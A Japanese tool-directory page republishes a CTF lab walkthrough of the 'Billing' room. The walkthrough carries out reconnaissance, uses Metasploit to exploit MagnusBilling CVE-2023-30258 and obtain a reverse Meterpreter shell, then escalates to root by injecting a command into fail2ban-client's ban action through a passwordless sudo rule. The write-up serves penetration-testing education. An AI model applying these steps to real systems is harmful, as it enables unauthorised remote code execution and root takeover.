Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Room-Walkthrough-Billing — Billing room における CVE-2023-30258 を悪用した詳細なウォークスルーと、fail2ban の設定ミスによる権限昇格 | Kitploit
ツール/GitHubGitHub/adityabhatt3010/room-walkthrough-billing
特権昇格偵察脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育ラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubadityabhatt3010/room-walkthrough-billing

Room-Walkthrough-Billing

Billing room における CVE-2023-30258 を悪用した詳細なウォークスルーと、fail2ban の設定ミスによる権限昇格

リポジトリを見る
1411ヶ月前未レビュー

🧠 ルームウォークスルー: Billing

作成者: Aditya Bhatt | オープンソースコントリビューター


📦 概要

このウォークスルーでは、Billing Roomに全力で取り組み、脆弱なMagnusBillingインスタンス、おいしい未認証RCE(CVE-2023-30258)、そして「私をrootにして」と叫んでいるfail2banのsudo設定ミスを紹介します。

このルームは、自動化された悪用と創造的な権限昇格を美しく融合させ、VoIP課金ソフトウェアに隠れた現実世界の欠陥を実践的に味わわせてくれます。 完全なPoC、解説、そして🗿な雰囲気とともに、初期偵察からルートシェルまで進みます。


🌐 ステップ1: 列挙フェーズ

🏁 初期アクセス

マシンをデプロイした後、最初にあなたを襲うのは、設定ミスのファイアウォールのようなものです:

root@kitploit:~
http://<machine_IP>/mbilling/

これはMagnusBillingのログインページです。それだけで警鐘が鳴ります — 魅力的なCVEプレイが始まることを知らせています。

サイト


🔍 Nmap詳細偵察 + Gobuster

究極の偵察コンボから始めます:

root@kitploit:~
nmap -A -sV -p- 10.10.115.173

🧠 発見事項:

  • ポート 5038 – Asterisk Call Manager/2.10.6
  • /mbilling/ 配下で他のHTTPサービスが利用可能

次に、Gobusterで総当たり攻撃を実行します:

root@kitploit:~
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 発見事項:

  • robots.txt

ロボット

🏗️ robots.txt

次に、サイトのrobots.txtに何かスパイシーなものがないか確認します:

root@kitploit:~
User-agent: *
Disallow: /mbilling/

ふむ…隠そうとするほど、ますます欲しくなりますね 😈

ロボット


🔌 ステップ2: 悪用

🔥 ポート5038 – Asterisk Manager

簡単なnetcatテストで、次の応答が確認されます:

root@kitploit:~
Response: Error
Message: Missing action in request

これによりさらに確認:バックエンドはMagnusBillingであり、ポートはAsterisk Call Managerに関連しています。暗黒の技を召喚する時です 🧙

5038


⚔️ 選択する武器: CVE-2023-30258

エクスプロイト: MagnusBillingにおける未認証リモートコード実行 モジュール: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Metasploitを起動:

root@kitploit:~
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf_1

次に要件を確認:

root@kitploit:~
show options

msf_2

次に以下を設定:

root@kitploit:~
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

msf_3
msf_4

数秒後… ドーン。 Meterpreterセッションを獲得!

root@kitploit:~
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64

TTYシェルの起動を試行:

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

msf_5_1


🧭 ステップ3: ユーザー列挙

次のように上位に移動を開始:

root@kitploit:~
cd ..
cd ..

msf_5_2

そして発見:

root@kitploit:~
cd /home/magnus
cat user.txt

msf_6

ナイス!しかし、まだ終わりではありません。rootが必要で、Magnusが秘密を囁いています。


🧨 ステップ4: 権限昇格

sudoで何を実行できるか確認しましょう:

root@kitploit:~
sudo -l

結果:

root@kitploit:~
(ALL) NOPASSWD: /usr/bin/fail2ban-client

さて、これは 🔥 です。fail2ban-clientを悪用して、banアクションを使用してrootとしてコマンドを実行できます。


🎯 Fail2Ban悪用 → ルートシェル

fail2banを再起動:

root@kitploit:~
sudo /usr/bin/fail2ban-client restart

次に、ルートフラグを盗むコマンドを注入:

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

banをトリガー(これによりコマンドが実行):

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

次に:

root@kitploit:~
cat /tmp/root.txt

msf_7

Root化完了。まるでボスのように。🗿🔥


✅ 最終まとめ表


🧠 学んだこと(別名: セミプロの知恵)

  1. 🔍 偵察はスキャンだけではない – 隠しページを探し、robots.txtを確認し、奇妙なポートを掘り下げる。
  2. 💣 既知のCVEを悪用する – MagnusBillingは公開エクスプロイト(CVE-2023-30258)に対して脆弱だった。
  3. 🔓 権限昇格は必ずしもカーネルエクスプロイトを意味しない – (fail2ban-clientのような)sudo権限の設定ミスも同様に危険である。
  4. ⚙️ 創造性が重要 – banアクションでユーザー制限を回避することは、現実世界の水平思考を示している。

🗿 最後に

このボックスは、自動化された悪用と手動によるポストエクスプロイトの創造性の美しいバランスでした。 MagnusBilling RCEからfail2banルーティングまで、ペンテスターのプレイリストにぴったりの曲をすべて網羅しています 🎧🎯

レベルアップを目指す初心者でも、フラグを収集するベテラン戦士でも、これは必須のpwnです。

次回まで、 危険でい続けよ。好奇心を持ち続けよ。雄大でい続けよ。🗿

ツールをダウンロード
🔎 段階💥 使用したアクション/ツール
初期アクセスNmap + Gobusterを使用して/mbillingポータルとポート5038を発見
偵察による発見MagnusBilling CMS + Asterisk Call Manager
悪用Metasploit経由でCVE-2023-30258 → Meterpreterシェル
列挙/home/magnus/user.txtを発見
権限昇格fail2ban-clientのsudo NOPASSWDを悪用 → rootとしてRCE
ルートフラグfail2banペイロードインジェクション経由で/root/root.txtを取得